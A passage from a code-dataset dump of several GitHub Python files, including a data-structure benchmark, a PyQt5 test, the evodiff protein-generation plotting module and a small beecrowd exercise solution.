== 1:\n ele = int(input(\"Please enter the element you would like to insert: \"))\n print(\"Benchmarking...\")\n start = time()\n linked_list = linked_list.insert_node(ele, 0)\n end = time()\n print(f\"Linked List: {end - start}\")\n\n start = time()\n binary_search_tree.add_value(ele)\n end = time()\n print(f\"Binary Search Tree: {end - start}\")\n\n start = time()\n hash_map.add_value(ele)\n end = time()\n print(f\"Hash Map: {end - start}\")\n\n start = time()\n array.insert_value(ele)\n end = time()\n print(f\"Array: {end - start}\")\n\n elif choice == 2:\n ele = int(input(\"Please enter the element you would like to search for: \"))\n print(\"Benchmarking...\")\n start = time()\n linked_list.search_node(ele)\n end = time()\n print(f\"Linked List: {end - start}\")\n\n start = time()\n binary_search_tree.search_value(ele)\n end = time()\n print(f\"Binary Search Tree: {end - start}\")\n\n start = time()\n hash_map.search_value(ele)\n end = time()\n print(f\"Hash Map: {end - start}\")\n\n start = time()\n array.search_value(ele)\n end = time()\n print(f\"Array: {end - start}\")\n\n elif choice == 3:\n ele = int(input(\"Please enter the element you would like to remove: \"))\n print(\"Benchmarking...\")\n start = time()\n linked_list = linked_list.remove_node(ele)\n end = time()\n print(f\"Linked List: {end - start}\")\n\n start = time()\n binary_search_tree.remove_value(ele)\n end = time()\n print(f\"Binary Search Tree: {end - start}\")\n\n start = time()\n hash_map.remove_value(ele)\n end = time()\n print(f\"Hash Map: {end - start}\")\n\n start = time()\n array.remove_value(ele)\n end = time()\n print(f\"Array: {end - start}\")\n\n elif choice == 4:\n print(\"\\nThe data structures currently are:\")\n print(f\"Linked List: \")\n linked_list.get_list()\n print(\"None\")\n\n print(f\"Binary Search Tree: \")\n 
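# get_tree() prints a preorder traversal, so the output is not in sorted order\n            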
binary_search_tree.get_tree()\n print(\"End\")\n\n hash_map.print_hash_map_readable()\n array.print_array()\n\n else:\n exit(1)","repo_name":"AdityaHegde712/Compiler-Design-problems","sub_path":"Activity 8/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39606762170","text":"import sys\nfrom PyQt5.QtWidgets import QWidget, QLabel, QApplication\nfrom GuiTests.Gui.Layouts import LAbsolute, LBoxLayout, LQGridLayout\n\nclass Example(QWidget):\n\n def __init__(self):\n super().__init__()\n layout = LQGridLayout.LQGridLayout()\n\n layout.__initUI__(self)\n\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = Example()\n sys.exit(app.exec_())","repo_name":"kmietek/ExchangeSpy","sub_path":"GuiTests/Gui/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28417664189","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport torch\nfrom torch.nn import KLDivLoss\nimport os\nimport itertools\nfrom scipy import stats\nimport numpy as np\nimport seaborn as sns\nimport difflib\nfrom itertools import chain\nfrom evodiff.utils import extract_seq_a3m, csv_to_dict, normalize_list, removekey, get_matrix, get_pairs, normalize_matrix, \\\n get_pairwise\n\ndef aa_reconstruction_parity_plot(project_dir, out_path, generate_file, msa=False, idr=False, gen_file=True,\n start_valid=False, start_query=False, start_msa=False):\n \"Parity plots for generated vs test (for sequence models) or valid (for MSA models)\"\n # Load in approx train distribution\n idr_flag = \"\"\n # Eliminate BXJOU for KL since they occur at 0 freq in test dataset\n keys_to_remove = ['B', 'Z', 'J', 'O', 'U'] #, '-']\n if msa:\n if start_valid:\n if start_query:\n valid_file = 'valid_msas_onlymsa.txt'\n elif start_msa:\n valid_file = 'valid_msas_onlyquery.txt'\n keys_to_remove += ['-']\n else:\n valid_file = 'valid_msas.a3m'\n valid_file = out_path + '/' + valid_file\n #print(valid_file)\n aminos = csv_to_dict(valid_file)\n values = list(aminos.values())\n else:\n file = project_dir + 'ref/openfold_ref.csv'\n else:\n file = project_dir + 'ref/uniref50_aa_ref_test.csv' # TODO add file to git\n #print(file)\n if idr:\n idr_flag = 'idr_'\n true_file = out_path + 'data_idr.csv'\n aminos = csv_to_dict(true_file)\n values = aminos.values()\n #print(aminos, values)\n elif not idr and not start_valid:\n df = pd.read_csv(file)\n aminos = df.to_dict('list')\n values = [each[0] for each in aminos.values()]\n if gen_file:\n gen_flag = ''\n # Load in generated seqs and count values\n generate_file = out_path + generate_file\n aminos_gen = csv_to_dict(generate_file)\n #print(\"aminos gen\", aminos_gen)\n else:\n gen_flag = '_train_only'\n # Normalize scores\n a = normalize_list(values) # normalize(list(aminos.values()))\n if start_valid:\n a_kl = normalize_list(list(removekey(aminos, keys_to_remove).values()))\n else:\n #print(aminos)\n a_kl = normalize_list([each[0] for each in removekey(aminos, keys_to_remove).values()])\n if gen_file:\n b_list = list(aminos_gen.values())\n b = normalize_list(b_list) # ADD GAPS IN\n # Save KL to file\n kl_loss = KLDivLoss(reduction=\"sum\")\n if msa:\n b_kl = normalize_list(list(removekey(aminos_gen, keys_to_remove).values()))\n #print(len(a_kl), len(b_kl))\n #print(a_kl, b_kl)\n kl = kl_loss(torch.tensor(a_kl).log(), 
torch.tensor(b_kl)).item()\n else:\n if idr:\n b_kl = torch.tensor(b[0:20])\n kl = kl_loss(torch.tensor(a[0:20]).log(), torch.tensor(b[0:20])).item()\n else:\n b_kl = torch.tensor(b[0:21])\n kl = kl_loss(torch.tensor(a[0:21]).log(), torch.tensor(b[0:21])).item()\n print(\"KL\", kl)\n with open(out_path + idr_flag + 'generate_metrics.csv', 'w') as f:\n f.write(\"aa freq kl:\" + str(kl))\n f.close()\n kl_label = \"$KL$=%.3f\" % (kl)\n\n # Plot\n colors = ['black', 'grey', 'lightcoral', 'brown', 'tomato', 'peru',\n 'darkorange', 'goldenrod', 'khaki', 'olive', 'yellow', 'olivedrab',\n 'yellowgreen', 'palegreen', 'forestgreen', 'turquoise', 'paleturquoise',\n 'cyan', 'deepskyblue', 'dodgerblue', 'royalblue', 'navy', 'blue',\n 'darkslateblue', 'mediumpurple', 'darkviolet', 'violet', 'mediumvioletred',\n 'crimson', 'lightpink']\n fig, ax = plt.subplots(figsize=(3, 2.5))\n annotations = list(aminos_gen.keys())[0:len(a)]\n plt.axline([0, 0], [0.1, 0.1], c='k', linestyle='dotted', alpha=0.75)\n for i, label in enumerate(annotations):\n plt.scatter(a[i], b[i], label=label, c=colors[i], edgecolors='k')\n ax.text(0.05, 0.95, kl_label, transform=ax.transAxes, fontsize=14,\n verticalalignment='top')\n plt.xlabel(\"Test Freq\", fontweight='bold')\n plt.ylabel(\"Gen Freq\", fontweight='bold')\n plt.tight_layout()\n fig.savefig(os.path.join(out_path, idr_flag+'parity_scatter.svg'))\n fig.savefig(os.path.join(out_path, idr_flag+'parity_scatter.png'))\n plt.close()\n if not gen_file:\n return a # return train probability distribution\n\n\ndef msa_substitution_rate(generated_msa, train_msa, alphabet, out_path):\n \"Plot substitution rates for generated MSAs\"\n print(alphabet, \"len: \", len(alphabet))\n all_aa = np.arange(len(alphabet))\n all_aa_pairs = list(itertools.product(all_aa, all_aa))\n\n all_pairs_train = get_pairs(train_msa, alphabet)\n train_matrix = get_matrix(all_pairs_train, all_aa_pairs, alphabet)\n print(\"train len\", len(all_pairs_train))\n train_table, train_vals, train_diag_vals = normalize_matrix(train_matrix.T, alphabet)\n\n all_pairs_gen = get_pairs(generated_msa, alphabet)\n print(\"gen len\", len(all_pairs_gen))\n gen_matrix = get_matrix(all_pairs_gen, all_aa_pairs, alphabet)\n gen_table, gen_vals, gen_diag_vals = normalize_matrix(gen_matrix.T, alphabet)\n\n # Plot substitution data as heatmaps\n vmax = 0.4\n fig, ax = plt.subplots(figsize=(3, 2.5))\n sns.heatmap(train_table, annot=False, cmap='Greens', vmin=0, vmax=vmax, ax=ax)\n ax.set_title('Train Substitution Freq', weight='bold', fontsize=14)\n fig.savefig(os.path.join(out_path, 'train_heatmap.svg'))\n fig.savefig(os.path.join(out_path, 'train_heatmap.png'))\n\n fig, ax = plt.subplots(figsize=(3, 2.5))\n sns.heatmap(gen_table, annot=False, cmap='Greens', vmin=0, vmax=vmax, ax=ax)\n ax.set_title('Gen Substitution Freq', weight='bold', fontsize=14)\n fig.savefig(os.path.join(out_path, 'gen_heatmap.svg'))\n fig.savefig(os.path.join(out_path, 'gen_heatmap.png'))\n\n # Plot substitution parity per AA\n fig, axes = plt.subplots(6, 5, figsize=(12, 15))\n for i, ax in enumerate(axes.ravel()[:len(alphabet)]):\n r_squared = stats.pearsonr(train_vals[i, :], gen_vals[i, :]).statistic\n label = \"$R$=%.2f\" % (r_squared)\n # mse = mean_squared_error(train_vals[i,:], gen_vals[i,:])\n # label = \"$mse$=%0.2f\"%(mse)\n ax.set_title(alphabet[i], fontsize=14, weight='bold')\n ax.plot([0, vmax], [0, vmax], linewidth=1, color='black', linestyle=\"--\")\n ax.scatter(train_vals[i, :], gen_vals[i, :], color='blue',\n linewidth=0, alpha=1)\n 
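# re-plot the diagonal entry (an amino acid substituted for itself) in red so it stands out\n        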
ax.scatter(train_vals[i, i], gen_vals[i, i], color='red',\n linewidth=0, alpha=1)\n # plt.scatter(train_diag_vals, gen_diag_vals, color='red', s=8, linewidth=0, label=\"Same AA\", alpha=0.5)\n ax.set_xlabel(\"True AA Substitution Rate\")\n ax.set_ylabel(\"Gen AA Substitution Rate\")\n # ax.legend(loc='upper left', frameon=False, handlelength=0, handletextpad=0)\n ax.text(0.05, 0.95, label, transform=ax.transAxes, fontsize=14,\n verticalalignment='top')\n subplots = 6 * 5\n for j in range(subplots - len(alphabet)):\n fig.delaxes(axes.ravel()[subplots - (j + 1)])\n plt.tight_layout()\n fig.savefig(os.path.join(out_path, 'substitution_per_AA.svg'))\n fig.savefig(os.path.join(out_path, 'substitution_per_AA.png'))\n\n\n # Plot for all data\n fig, ax = plt.subplots(figsize=(3, 2.5))\n r_squared = stats.pearsonr(train_vals.flatten(), gen_vals.flatten()).statistic\n label = \"$R$=%.2f\" % (r_squared)\n plt.scatter(train_vals, gen_vals, color='blue', linewidth=0, label=\"$R^2$=%.2f\" % (r_squared), alpha=0.5)\n plt.plot([0, vmax], [0, vmax], linewidth=1, color='black', linestyle=\"--\")\n plt.xlabel(\"True AA Substitution Rate\")\n plt.ylabel(\"Gen AA Substitution Rate\")\n ax.text(0.05, 0.95, label, transform=ax.transAxes, fontsize=14,\n verticalalignment='top')\n plt.tight_layout()\n fig.savefig(os.path.join(out_path, 'substitution_nondiag.svg'))\n fig.savefig(os.path.join(out_path, 'substitution_nondiag.png'))\n\n # Plot only same AA substitutions\n fig, ax = plt.subplots(figsize=(3, 2.5))\n r_squared = stats.pearsonr(train_diag_vals, gen_diag_vals).statistic\n label = \"$R$=%.2f\" % (r_squared)\n plt.scatter(train_diag_vals, gen_diag_vals, color='red', linewidth=0, label=\"$R^2$=%.2f\" % (r_squared), alpha=1)\n plt.plot([0, vmax], [0, vmax], linewidth=1, color='black', linestyle=\"--\")\n plt.xlabel(\"True AA Substitution Rate\")\n plt.ylabel(\"Gen AA Substitution Rate\")\n ax.text(0.05, 0.95, label, transform=ax.transAxes, fontsize=14,\n verticalalignment='top')\n plt.tight_layout()\n fig.savefig(os.path.join(out_path, 'substitution_diag.svg'))\n fig.savefig(os.path.join(out_path, 'substitution_diag.png'))\n\ndef msa_pairwise_interactions(generated_msa, train_msa, all_aa, out_path): # Look at AA pairwise interactions within each MSA within each sample\n \"Pairwise plots for MSAs\"\n all_aa_pairs = list(itertools.product(all_aa, all_aa))\n all_aa_dict = {''.join(k): 1 for k in all_aa_pairs}\n all_aa_dict = {k: all_aa_dict[k] for k in sorted(all_aa_dict.keys())}\n\n all_pairs_train = get_pairwise(train_msa, all_aa)\n\n count_map_train = {}\n for i in all_pairs_train:\n i = ''.join(i)\n count_map_train[i] = count_map_train.get(i, 0) + 1\n\n for aa_pair in all_aa_dict.keys():\n if aa_pair not in count_map_train.keys():\n count_map_train[aa_pair] = 0\n\n train_dict = {k: count_map_train[k] for k in sorted(count_map_train.keys())}\n total_train = sum(train_dict.values())\n for k in train_dict.keys():\n train_dict[k] = train_dict[k] / total_train\n\n all_pairs_gen = get_pairwise(generated_msa, all_aa)\n\n count_map_gen = {}\n for i in all_pairs_gen:\n i = ''.join(i)\n count_map_gen[i] = count_map_gen.get(i, 0) + 1\n\n for aa_pair in all_aa_dict.keys():\n if aa_pair not in count_map_gen.keys():\n count_map_gen[aa_pair] = 0\n\n gen_dict = {k: count_map_gen[k] for k in sorted(count_map_gen.keys())}\n total_gen = sum(gen_dict.values())\n for k in gen_dict.keys():\n gen_dict[k] = gen_dict[k] / total_gen\n\n train_vals = list(train_dict.values())\n gen_vals = list(gen_dict.values())\n\n r_squared = 
stats.pearsonr(train_vals, gen_vals).statistic\n\n fig, ax = plt.subplots(figsize=(3, 2.5))\n label = \"$R$=%.2f\" % (r_squared)\n plt.plot([0, 0.02], [0, 0.02], linewidth=1, color='black', linestyle=\"--\")\n plt.scatter(train_vals, gen_vals, color='blue', linewidth=0, alpha=0.5) # marker = alpha\n plt.xlabel(\"True Parwise Interactions\")\n plt.ylabel(\"Gen Parwise Interactions\")\n ax.text(0.05, 0.95, label, transform=ax.transAxes, fontsize=14,\n verticalalignment='top')\n plt.tight_layout()\n fig.savefig(os.path.join(out_path, 'pairwise.svg'))\n fig.savefig(os.path.join(out_path, 'pairwise.png'))\n\ndef plot_tmscores(tmscore_path, out_path, y_min=0, y_max=30):\n \"TMscores for conditionally generated sequences, given MSAs\"\n tmscores = pd.read_csv(tmscore_path, names=['scores'])\n fig, ax = plt.subplots(figsize=(3, 2.5))\n sns.histplot(tmscores['scores'], color='blue')\n plt.xlabel('TM Scores')\n plt.xlim(0, 1)\n plt.ylim(y_min,y_max)\n plt.tight_layout()\n fig.savefig(os.path.join(out_path, 'tmscores.svg'))\n fig.savefig(os.path.join(out_path, 'tmscores.png'))\n\ndef plot_perp_group_masked(df, save_name, mask='mask'):\n \"Plot perplexity computed from Masked models, binned by % of sequence masked \"\n bins = np.arange(0, 1.1, 0.1)\n df['binned'] = pd.cut(df['time'], bins)\n group = df.groupby(pd.cut(df['time'], bins))\n plot_centers = (bins[:-1] + bins[1:]) / 2\n plot_values = np.exp(group['loss'].sum()/group['tokens'].sum())\n fig, ax = plt.subplots(figsize=(3, 2.5))\n plt.plot(plot_centers*100, plot_values, c='b', marker='o')\n ax.set_xticks([100, 80, 60, 40, 20, 0])\n if mask=='causal-mask':\n plt.gca().invert_xaxis()\n plt.xlabel('% Sequence')\n else:\n ax.set_xticks([0, 20, 40, 60, 80, 100])\n plt.xlabel('% Masked')\n plt.ylabel('Perplexity')\n plt.ylim(0,25)\n plt.tight_layout()\n fig.savefig(os.path.join('plots/perp_'+save_name+'.png'))\n\ndef plot_perp_group_d3pm(df, save_name):\n \"Plot perplexity computed from D3PM models, binned by timestep intervals\"\n bins = np.arange(0, 550, 50)\n df['binned'] = pd.cut(df['time'], bins)\n group = df.groupby(pd.cut(df['time'], bins))\n plot_centers = (bins[:-1] + bins[1:]) / 2\n plot_values = np.exp(group['loss'].sum()/group['tokens'].sum())\n fig, ax = plt.subplots(figsize=(3, 2.5))\n plt.plot(plot_centers, plot_values, c='b', marker='o')\n ax.set_xticks([0, 100, 200, 300, 400, 500])\n plt.xlabel('Timestep')\n plt.ylabel('Perplexity')\n plt.ylim(0, 25)\n plt.tight_layout()\n fig.savefig(os.path.join('plots/perp_' + save_name + '.png'))\n\n\ndef plot_ecdf_bylength(perp_groups, colors, labels, seq_lengths, metric='perp', model='esm-if'):\n \"Plots cumulative density as a function of sequence length\"\n fig, ax = plt.subplots(1,4, figsize=(8.,2.5), sharey=True, sharex=True)\n for j, perp_group in enumerate(perp_groups):\n for i,p in enumerate(perp_group):\n c=colors[j]\n sns.ecdfplot(x=p,\n label=labels[j],\n color=c,\n alpha=1,\n ax=ax[i])\n if metric=='perp':\n ax[i].set_xlabel(model+' Perplexity')\n elif metric=='plddt':\n ax[i].set_xlabel(model+' pLDDT')\n ax[i].set_title(\"seq length=\"+str(seq_lengths[i]))\n ax[i].axvline(x=np.mean(perp_groups[0][i]), c='k', ls='--', lw=0.75)\n ax[-1].legend(fontsize=8, loc='upper left')\n if model == 'ESM-IF':\n plt.xlim(0, 25)\n elif model == 'MPNN':\n plt.xlim(0, 6)\n elif model == 'Omegafold':\n plt.xlim(10, 100)\n plt.tight_layout()\n fig.savefig(os.path.join('plots/sc_'+metric+'_bylength_'+model+'.svg'))\n fig.savefig(os.path.join('plots/sc_'+metric+'_bylength_'+model+'.png'))\n\ndef 
plot_sc_boxplot(perp_groups, colors, labels, metric='perp', model='ESM-IF', length_model='small', legend=False):\n fig, ax = plt.subplots(1, 1, figsize=(3,3.5), sharey=True, sharex=True)\n all_perp = []\n all_names = []\n all_colors = []\n for i, perp_group in enumerate(perp_groups):\n [all_perp.append(item) for item in list(chain.from_iterable(perp_group))]\n [all_names.append(labels[i]) for _ in range(len(list(chain.from_iterable(perp_group))))]\n all_colors.append(colors[i])\n\n df = pd.DataFrame()\n df['value'] = all_perp\n df['names'] = all_names\n sns.boxplot(data=df, x=\"names\", y=\"value\", ax=ax, palette=all_colors)\n\n ax.axhline(y=np.median(list(chain.from_iterable(perp_groups[0]))), c='k', ls='--', lw=0.75)\n ax.set_xticklabels(ax.get_xticklabels(), rotation=45, horizontalalignment='right')\n\n if legend:\n ax.legend()\n if model == 'ESM-IF':\n ax.set_ylim(0, 25)\n elif model == 'MPNN':\n ax.set_ylim(0, 6)\n elif model == 'Omegafold':\n ax.set_ylim(10, 100)\n plt.tight_layout()\n fig.savefig(os.path.join('plots/sc_' + metric + '_' + model + '_' + length_model + '.svg'))\n fig.savefig(os.path.join('plots/sc_' + metric + '_' + model + '_' + length_model + '.png'))\n\ndef plot_ecdf(perp_groups, colors, labels, metric='perp', model='ESM-IF', length_model='small', legend=False):\n \"Plot cumulative density plot of plddt, or perp scores for each set of gen sequences\"\n fig, ax = plt.subplots(1,1, figsize=(2.5,2.5), sharey=True, sharex=True)\n for i, perp_group in enumerate(perp_groups):\n c = colors[i]\n all_perp = list(chain.from_iterable(perp_group))\n sns.ecdfplot(x=all_perp,\n label=labels[i],\n color=c,\n alpha=1,\n ax=ax)\n if metric == 'perp':\n ax.set_xlabel(model + ' Perplexity')\n elif metric == 'plddt':\n ax.set_xlabel(model + ' pLDDT')\n ax.set_title(\"all sequences\")\n ax.axvline(x=np.mean(list(chain.from_iterable(perp_groups[0]))), c='k', ls='--', lw=0.75)\n if legend:\n ax.legend()\n if model=='ESM-IF':\n ax.set_xlim(0,25)\n elif model == 'MPNN':\n ax.set_xlim(0,6)\n elif model == 'Omegafold':\n ax.set_xlim(10, 100)\n plt.tight_layout()\n fig.savefig(os.path.join('plots/sc_'+metric+'_'+model+'_'+length_model+'.svg'))\n fig.savefig(os.path.join('plots/sc_'+metric+'_'+model+'_'+length_model+'.png'))\n\ndef plot_plddt_perp(ordered_plddt_group, ordered_perp_group, idx, colors, labels, perp_model='ESM-IF', length_model='small'):\n \"Plot pLDDT vs Perplexity for each set of generated sequences against train data\"\n fig, ax = plt.subplots(1, 1, figsize=(3, 2.5), sharey=True, sharex=True)\n plt.scatter(ordered_plddt_group[0], ordered_perp_group[0], c=colors[0], s=20, alpha=1, label=labels[0], edgecolors='grey')\n plt.scatter(ordered_plddt_group[idx], ordered_perp_group[idx], c=colors[idx], s=20, alpha=1, label=labels[idx], edgecolors='k')\n plt.ylim(0, 25)\n plt.xticks([25, 50, 75, 100])\n ax.set_ylabel(perp_model + ' Perplexity')\n ax.set_xlabel('pLDDT')\n plt.tight_layout()\n fig.savefig(os.path.join('plots/sc_plddt_perp_'+labels[idx]+'_'+length_model+'.svg'))\n fig.savefig(os.path.join('plots/sc_plddt_perp_'+labels[idx]+'_'+length_model+'.png'))\n\ndef ss_helix_strand(runs, data, labels, save_name):\n \"2D Probability Density plots for DSSP 3-state predictions of % Helix and % Sheet\"\n fig, ax = plt.subplots(nrows=3, ncols=4, figsize=(10, 7), constrained_layout=True, sharex=False, sharey=False)\n ax = ax.ravel()\n for i, run in enumerate(runs):\n helix = data[data['type'] == run]['helix_percent']\n strand = data[data['type'] == run]['strand_percent']\n\n 
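# pull each panel title inside its axes: titley is in axes-relative coordinates and the negative titlepad shifts it downward\n        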
plt.rcParams['axes.titley'] = 1.0 # y is in axes-relative coordinates.\n plt.rcParams['axes.titlepad'] = -14\n ax[i].set_title(labels[i])\n\n sns.kdeplot(x=helix, y=strand,\n fill=True, thresh=0.001, levels=10,\n cmap='Greys', ax=ax[i], cbar=False, common_norm=True)\n ax[i].set_xlabel('% Helix per Seq')\n ax[i].set_ylabel('% Strand per Seq')\n ax[i].set_xlim(-0.05, 1)\n ax[i].set_ylim(-0.05, 1)\n #plt.tight_layout()\n fig.savefig(os.path.join('plots/helix_strand_' + save_name + '.svg'))\n fig.savefig(os.path.join('plots/helix_strand_' + save_name + '.png'))\n\ndef ss_box_whisker(data, colors, save_name):\n \"Create box and whisker plot for DSSP 3-state secondary structure predictions\"\n fig, ax = plt.subplots(1, 3, figsize=(7, 3.5), sharex=True, sharey=True)\n sns.boxplot(data=data, x=\"helix_percent\", y=\"type\", ax=ax[0], palette=colors)\n sns.boxplot(data=data, x=\"strand_percent\", y=\"type\", ax=ax[1], palette=colors)\n sns.boxplot(data=data, x=\"other_percent\", y=\"type\", ax=ax[2], palette=colors)\n ax[0].set_xlabel('% Helix per Sequence')\n ax[1].set_xlabel('% Strand per Sequence')\n ax[2].set_xlabel('% Loop per Sequence')\n [ax[i].set_ylabel(None) for i in range(len(ax))]\n plt.tight_layout()\n fig.savefig(os.path.join('plots/' + save_name + '_structure_box.svg'))\n fig.savefig(os.path.join('plots/' + save_name + '_structure_box.png'))\n\ndef plot_embedding(train_emb, run_emb, colors, i, runs, project_run):\n \"Plot embedding space of sequences as 2D TSNE \"\n fig, ax = plt.subplots(figsize=(5, 5))\n # Plot test\n plt.scatter(train_emb[:, 0][::10], train_emb[:, 1][::10], s=20, alpha=1, c=colors[0],\n edgecolors='grey')\n # Plot run\n plt.scatter(run_emb[:, 0], run_emb[:, 1], s=20, alpha=0.95,\n c=colors[i+1], edgecolors='k')\n ax.axis('off')\n fig.savefig(os.path.join('plots/fid_' + runs[i+1] + '_' + project_run + '.svg'))\n fig.savefig(os.path.join('plots/fid_' + runs[i+1] + '_' + project_run + '.png'))\n\ndef clean_list(list):\n cleanedList = [x for x in list if x ==x]\n return cleanedList\n\ndef plot_percent_similarity(all_df, colors, legend=False):\n fig, ax = plt.subplots(1, 1, figsize=(2.5, 2.5), sharey=True, sharex=True)\n #sns.set_palette(sns.color_palette(\"viridis\", len(runs)))\n sns.ecdfplot(all_df, ax=ax, legend=legend, palette=colors)\n #f = sns.boxplot([all_df['Valid MSA'].dropna(), all_df['Cond Max'].dropna(), all_df['Cond Rand'].dropna()],\n # ax=ax, palette=colors)\n #f.set(xticklabels=['Valid MSA', 'Cond Max', 'Cond Rand'])\n ax.set_xlabel('% Similarity to Original MSA')\n ax.axvline(x=25, c='k', ls='--', lw=0.75)\n ax.set_title(\"% Sim\")\n plt.tight_layout()\n fig.savefig(os.path.join('plots/simmsa.svg'))\n fig.savefig(os.path.join('plots/simmsa.png'))\n\ndef plot_conditional_tmscores(tm_df, palette, legend=False, save_path='plots/'):\n fig, ax = plt.subplots(1, 1, figsize=(2.5, 2.5), sharey=True, sharex=True)\n sns.ecdfplot(tm_df, palette=palette, ax=ax, legend=legend)\n ax.set_title(\" \")\n ax.axvline(x=0.5, c='k', ls='--', lw=0.75)\n plt.xlim(0,1)\n ax.set_ylabel('CDF')\n ax.set_xlabel('TM Score')\n plt.tight_layout()\n fig.savefig(os.path.join(save_path+'_tmscore.svg'))\n fig.savefig(os.path.join(save_path+'_tmscore.png'))\n\ndef plot_conditional_rmsd(pdb, motif_df, out_path='plots/'):\n fig, ax = plt.subplots(1, 3, figsize=(7.5, 2.5))\n ax[0].scatter(motif_df['scaffold_lengths'], motif_df['rmsd'], edgecolors='grey', c='#D0D0D0')\n ax[0].set_xlabel('Scaffold Lengths')\n ax[0].set_ylabel(r'Motif RMSD ($\\AA$)')\n ax[1].scatter(motif_df['scores'], 
motif_df['rmsd'], edgecolors='grey', c='#D0D0D0')\n ax[1].set_xlabel('pLDDT entire sequence')\n ax[1].set_ylabel(r'Motif RMSD ($\\AA$)')\n ax[2].scatter(motif_df['scores_fixed'], motif_df['rmsd'], edgecolors='grey', c='#527d99')\n ax[2].set_xlabel('pLDDT fixed region')\n ax[2].set_ylabel(r'Motif RMSD ($\\AA$)')\n ax[0].axhline(y=1, c='k', ls='--', lw=0.75)\n ax[1].axhline(y=1, c='k', ls='--', lw=0.75)\n ax[2].axhline(y=1, c='k', ls='--', lw=0.75)\n plt.title(\" \")\n ax[1].set_xlim(0, 100)\n ax[2].set_xlim(0, 100)\n plt.tight_layout()\n fig.savefig(os.path.join(out_path + pdb + '.png'))\n\ndef plot_conditional_sim(sim, out_path='plots/'):\n fig, ax = plt.subplots(figsize=(2.5, 2.5))\n sns.histplot(sim, color='grey', bins=10, ax=ax)\n plt.xlabel('% Seq similarity (Fixed)')\n plt.title(\" \")\n plt.xlim(0, 100)\n plt.tight_layout()\n fig.savefig(out_path + '_similarity.png')\n\ndef idr_parity_plot(mean_og_score, mean_gen_score, out_path):\n fig, ax = plt.subplots(figsize=(6, 2.5))\n r_squared = stats.pearsonr(mean_og_score, mean_gen_score).statistic\n label = \"$R$=%.2f\" % (r_squared)\n plt.axline([0, 0], [1, 1], c='k', linestyle='dotted', alpha=0.75)\n ax.text(0.05, 0.95, label, transform=ax.transAxes, fontsize=14,\n verticalalignment='top')\n plt.scatter(mean_og_score, mean_gen_score, c='grey', edgecolors='k')\n plt.xlabel(\"Per-Res Score True\", fontweight='bold')\n plt.ylabel(\"Per-Res Score Gen\", fontweight='bold')\n plt.tight_layout()\n fig.savefig(os.path.join(out_path, 'idr_parity_scatter.svg'))\n fig.savefig(os.path.join(out_path, 'idr_parity_scatter.png'))\n plt.close()\n\ndef plot_idr(out_fpath, df, start, end, save_iter):\n fig, ax = plt.subplots(figsize=(6,3))\n plt.plot(df['resid'], df['score'], c='b')\n plt.axhline(y=0.5, c='k', ls='--')\n #plt.axvline(x=end, c='k', ls='--')\n plt.axvspan(start, end, alpha=0.1, color='b')\n plt.ylabel('score')\n plt.xlabel('residue')\n plt.tight_layout()\n fig.savefig(out_fpath+'idr_'+str(save_iter)+'.svg')\n fig.savefig(out_fpath+'idr_'+str(save_iter)+'.png')\n\ndef plot_idr_drbert(out_fpath, prefix, df, start, end, save_iter):\n fig, ax = plt.subplots(figsize=(6,3))\n x = np.arange(0,len(df['score'][save_iter]))\n plt.plot(x, df['score'][save_iter], c='b')\n #plt.axhline(y=0.5, c='k', ls='--')\n #plt.axvline(x=end, c='k', ls='--')\n plt.axvspan(start, end, alpha=0.1, color='b')\n plt.ylabel('score')\n plt.xlabel('residue')\n plt.ylim(0,1)\n plt.tight_layout()\n fig.savefig(out_fpath+'svg/'+prefix+str(save_iter)+'.svg')\n #fig.savefig(out_fpath+prefix+str(save_iter)+'.png')\n\n\ndef plot_idr_drbert_multiple(out_fpath, prefix, df, start, end, df2, start2, end2, save_iter):\n fig, ax = plt.subplots(figsize=(4,1.5))\n x = np.arange(0,len(df['score'][save_iter]))\n x2 = np.arange(0,len(df2['score'][save_iter]))\n plt.plot(x, df['score'][save_iter], c='#1E9AC7')\n plt.plot(x2, df2['score'][save_iter], c='grey')\n plt.axvspan(start, end, alpha=0.25, color='#1E9AC7')\n plt.ylabel('score')\n plt.xlabel('residue')\n plt.ylim(0,1)\n plt.tight_layout()\n fig.savefig(out_fpath+'svg/'+prefix+str(save_iter)+'.svg')\n\ndef idr_boxplot(gen_disorder_percent, gen_order_percent, out_fpath, save_name):\n fig, ax = plt.subplots(figsize=(3,3))\n f = sns.boxplot([gen_disorder_percent, gen_order_percent], ax=ax)\n f.set(xticklabels=['Disorder', 'Non-Disordered'])\n plt.ylim(0,1)\n plt.tight_layout()\n fig.savefig(out_fpath+save_name+'idr_box.svg')\n fig.savefig(out_fpath+save_name+'idr_box.png')\n\ndef idr_boxplot_all(df, out_fpath, save_name):\n print(df)\n fig, 
ax = plt.subplots(figsize=(3,3))\n f = sns.boxplot(data=df, x=\"region\", y=\"score\", hue='type', ax=ax)\n f.set(xticklabels=['Disorder', 'Non-Disordered'])\n plt.ylim(0,1)\n plt.tight_layout()\n fig.savefig(out_fpath+save_name+'idr_box.svg')\n fig.savefig(out_fpath+save_name+'idr_box.png')","repo_name":"microsoft/evodiff","sub_path":"evodiff/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":26006,"program_lang":"python","lang":"en","doc_type":"code","stars":323,"dataset":"github-code","pt":"48"} +{"seq_id":"15114314860","text":"alcool = 0\r\ngasol = 0\r\ndiesel = 0\r\nwhile True:\r\n x = int(input())\r\n if x == 4:\r\n break\r\n elif x == 1:\r\n alcool += 1\r\n elif x == 2:\r\n gasol += 1\r\n elif x == 3:\r\n diesel += 1\r\n\r\nprint(\"MUITO OBRIGADO\")\r\nprint(f\"Alcool: {alcool}\")\r\nprint(f\"Gasolina: {gasol}\")\r\nprint(f\"Diesel: {diesel}\")\r\n","repo_name":"GersonRS/beecrowd","sub_path":"Iniciante/python-solution/1134-tipo-de-combustivel/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"13267183320","text":"import csv\nimport urllib.request\n\nfrom functools import wraps\nfrom pytrivia import Category, Diffculty, Type, Trivia\nfrom flask import Flask, flash, 